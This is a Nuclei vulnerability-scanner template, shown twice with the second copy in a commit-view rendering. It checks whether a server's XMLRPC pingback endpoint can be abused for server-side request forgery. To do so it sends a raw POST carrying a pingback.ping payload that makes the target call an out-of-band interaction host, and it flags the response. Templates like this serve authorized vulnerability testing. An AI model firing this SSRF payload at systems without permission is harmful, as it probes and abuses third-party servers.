nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml

id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  reference: https://hackerone.com/reports/406387
  severity: high
  tags: ssrf,generic

requests:
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param>
        <value>http://{{interactsh-url}}</value>
        </param>
        </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh-protocol
        words:
          - "http"
Create xmlrpc-pingback-ssrf.yaml 2021-08-18 11:09:22 +00:00			`id: xmlrpc-pingback-ssrf`

			`info:`
			`name: XMLRPC Pingback SSRF`
			`author: geeknik`
			`reference: https://hackerone.com/reports/406387`
			`severity: high`
			`tags: ssrf,generic`

			`requests:`
			`- raw:`
			`- \|`
			`POST /xmlrpc/pingback HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8`

			`<?xml version="1.0" encoding="UTF-8"?>`
			`<methodCall>`
			`<methodName>pingback.ping</methodName>`
			`<params>`
			`<param>`
			`<value>http://{{interactsh-url}}</value>`
			`</param>`
			`</params>`
			`</methodCall>`

			`matchers:`
			`- type: word`
			`part: interactsh-protocol`
			`words:`
			`- "http"`